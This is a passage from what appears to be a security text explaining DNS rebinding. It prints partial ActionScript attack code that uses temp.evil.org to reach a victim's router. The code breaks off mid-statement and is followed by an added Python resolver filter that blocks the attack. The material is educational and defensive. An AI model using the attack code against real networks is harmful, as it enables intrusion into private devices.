Suppose a victim visits evil.org to see some pictures of cute kittens. The victim types
in evil.org and presses enter. The browser and operating system go to evil.org's DNS
server, perform a DNS query, and get the IP address 1.1.1.3 with a long TTL. The IP
address for evil.org will not change in this example.
Next, the browser downloads many things from evil.org, such as an HTML page,
images of cute kittens, and a hidden Flash application. The bait and switch is done with
temp.evil.org within the hidden Flash application whose source is shown here:
import flash.net.*;

class DnsPinningAttackApp {
    static var app:DnsPinningAttackApp;
    static var sock:Socket;
    static var timer:Timer;

    function DnsPinningAttackApp() {
        // Step 1: The Bait
        // This request is sent to 1.1.1.3
        flash.system.Security.loadPolicyFile("http://temp.evil.org/"
            + "MyOpenCrossDomainPolicy.xml");

        // Step 2: The Switch
        // Wait 5 seconds to ensure that Flash loaded the security policy
        // correctly and this program can talk to temp.evil.org.
        // Wait another 5 seconds for the DNS server for temp.evil.org to
        // change from 1.1.1.3 to 192.168.1.1.
        // Run connectToRouter() in 10 seconds.
        timer = new Timer(5000+5000, 1);
        timer.
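A resolver-side mitigation for the switch step above, as an added example that is not from the book: it rejects any DNS answer in which a name outside a constructed internal zone (corp.example) resolves to a private or loopback address, the same idea as the rebind protection some DNS forwarders offer. The sample answers are constructed.

```python
import ipaddress
from dataclasses import dataclass

# Address ranges a name from the public Internet should never resolve to.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

# Constructed: zone suffixes that legitimately resolve to internal hosts.
INTERNAL_SUFFIXES = ("corp.example",)

@dataclass
class Answer:
    name: str   # queried hostname
    ip: str     # address from the A/AAAA record
    ttl: int    # seconds the client may cache it (informational here)

def _is_internal_name(name: str) -> bool:
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in INTERNAL_SUFFIXES)

def is_rebind_attempt(answer: Answer) -> bool:
    # A public name answering with a private/loopback address is exactly the
    # "switch" step above: temp.evil.org suddenly pointing at the router.
    addr = ipaddress.ip_address(answer.ip)
    if not any(addr in net for net in PRIVATE_NETS):
        return False
    return not _is_internal_name(answer.name)

def filter_answers(answers):
    # Split a stream of answers into (allowed, blocked), as a filtering
    # resolver would before handing them to the client.
    allowed, blocked = [], []
    for a in answers:
        (blocked if is_rebind_attempt(a) else allowed).append(a)
    return allowed, blocked

# Constructed sample: the two answers from the attack narrative plus one
# legitimate internal host. Only the second temp.evil.org answer is dropped.
SAMPLE = [
    Answer("temp.evil.org", "1.1.1.3", 1),
    Answer("temp.evil.org", "192.168.1.1", 1),
    Answer("printer.corp.example", "192.168.1.20", 3600),
]

if __name__ == "__main__":
    allowed, blocked = filter_answers(SAMPLE)
    print("blocked:", [(a.name, a.ip) for a in blocked])
```

The check is deliberately independent of TTL: a short TTL is the attacker's tool, so the decision rests only on where the name points.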